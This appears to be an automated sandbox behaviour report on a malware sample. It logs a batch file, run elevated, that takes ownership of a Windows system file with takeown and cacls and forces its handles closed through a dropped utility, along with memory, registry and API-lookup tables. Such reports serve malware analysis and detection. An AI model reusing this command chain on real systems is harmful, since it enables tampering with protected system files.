| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:52, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Self Terminated |
| Monitor Duration | 00:00:40 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc70 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C6C
0x
FD0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d90000 | 0x00d90000 | 0x04d8ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004d90000 | 0x04d90000 | 0x04daffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d90000 | 0x04d90000 | 0x04d9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004da0000 | 0x04da0000 | 0x04da3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004db0000 | 0x04db0000 | 0x04db1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004db0000 | 0x04db0000 | 0x04db3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004dc0000 | 0x04dc0000 | 0x04dd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004de0000 | 0x04de0000 | 0x04e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e20000 | 0x04e20000 | 0x04f1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f20000 | 0x04f20000 | 0x04f23fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004f30000 | 0x04f30000 | 0x04f30fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004f40000 | 0x04f40000 | 0x04f41fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04f50000 | 0x0500dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005010000 | 0x05010000 | 0x0504ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005050000 | 0x05050000 | 0x0509ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005050000 | 0x05050000 | 0x0505ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005090000 | 0x05090000 | 0x0509ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050d0000 | 0x050d0000 | 0x050dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050e0000 | 0x050e0000 | 0x0531ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050e0000 | 0x050e0000 | 0x051dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005220000 | 0x05220000 | 0x0531ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05320000 | 0x05656fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e9b0000 | 0x7e9b0000 | 0x7eaaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eab0000 | 0x7eab0000 | 0x7ead2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ead5000 | 0x7ead5000 | 0x7ead5fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ead9000 | 0x7ead9000 | 0x7eadbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eadc000 | 0x7eadc000 | 0x7eadcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eadd000 | 0x7eadd000 | 0x7eadffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 83 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 62 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 23 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 8, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xa88, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xa4c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xcf4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "JNTFiltr.dll.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "JNTFiltr.dll.mui" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #157: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #157 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:53, Reason: Child Process |
| Unmonitor | End Time: 00:02:56, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc5c |
| Parent PID | 0xf0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
4E0
0x
C4C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00210000 | 0x00239fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0025ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00480000 | 0x0053dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x006effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006f0000 | 0x006f0000 | 0x00877fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x00a00fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x01e0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x73d90000 | 0x73e21fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
